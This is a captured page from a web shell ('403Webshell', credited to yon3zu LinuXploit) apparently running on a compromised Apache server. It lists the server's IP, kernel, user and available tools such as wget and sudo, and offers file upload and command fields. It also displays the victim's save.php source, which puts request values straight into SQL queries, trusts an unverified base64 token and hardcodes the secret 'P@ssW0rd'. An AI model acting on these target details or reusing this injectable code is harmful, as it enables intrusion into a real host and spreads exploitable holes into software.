403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms-backup/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /mnt/blockstorage/ctms-backup/api/save.php
<?php
    header('Access-Control-Allow-Origin: *');

    header('Access-Control-Allow-Methods: GET, POST');
    
    header("Access-Control-Allow-Headers: X-Requested-With");
    
    include ('database.php');

    $json = json_encode($_REQUEST['json']);
    $code = $conn->real_escape_string($_REQUEST['code']); 
    $id = $_REQUEST['slug'];

    $user_token = base64_decode(base64_decode($_REQUEST['user_token'])); // Sanitize the token
        
    $secret_key = 'P@ssW0rd'; // The same secret key used on the source site
    
    // Split the token into user ID and expiration time
    list($user_id, $expiration_time) = explode('|', $user_token);

  

    if($user_id != null){
        if(!isUnique($id,$user_id,$conn))
        {
            
            $sql = "UPDATE authoring_tool SET json=$json, code='$code' WHERE slug=$id AND user_id=$user_id";
        
            if ($conn->query($sql) === TRUE) {
                $data = array("status" => "success", "json"=>$json);

                header("Content-Type: application/json");
                echo json_encode($data);
            } else {
                $data = array("status" => "failed","message"=>$conn->error);
                header("Content-Type: application/json");
                echo json_encode($data);
            }
        }
        else{
            $sql = "INSERT INTO authoring_tool (`json`,`post_id`,`slug`,`user_id`,`code`) VALUES($json,0,$id,$user_id,'$code')";
                if ($conn->query($sql) === TRUE) {
                    $data = array("status" => "success");
                    header("Content-Type: application/json");
                    echo json_encode($data);
                } else {
                    $data = array("status" => "failed","message"=>$conn->error);
                    header("Content-Type: application/json");
                    echo json_encode($data);
                }
        }
    }
    else{
        $data = array("status" => "failed","message"=>"User not found");
        header("Content-Type: application/json");
        echo json_encode($data);
    }
    

    $conn->close();

    function isUnique($id,$user_id,$conn){
        $query = "SELECT id from authoring_tool where slug='$id' AND  user_id='$user_id'";
        
        if ($result = $conn->query($query)) {
            
            $rowcount = mysqli_num_rows( $result );
            
            if($rowcount == 0){
                return true;
            }
            else{
                return false;
            }
         }
    }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit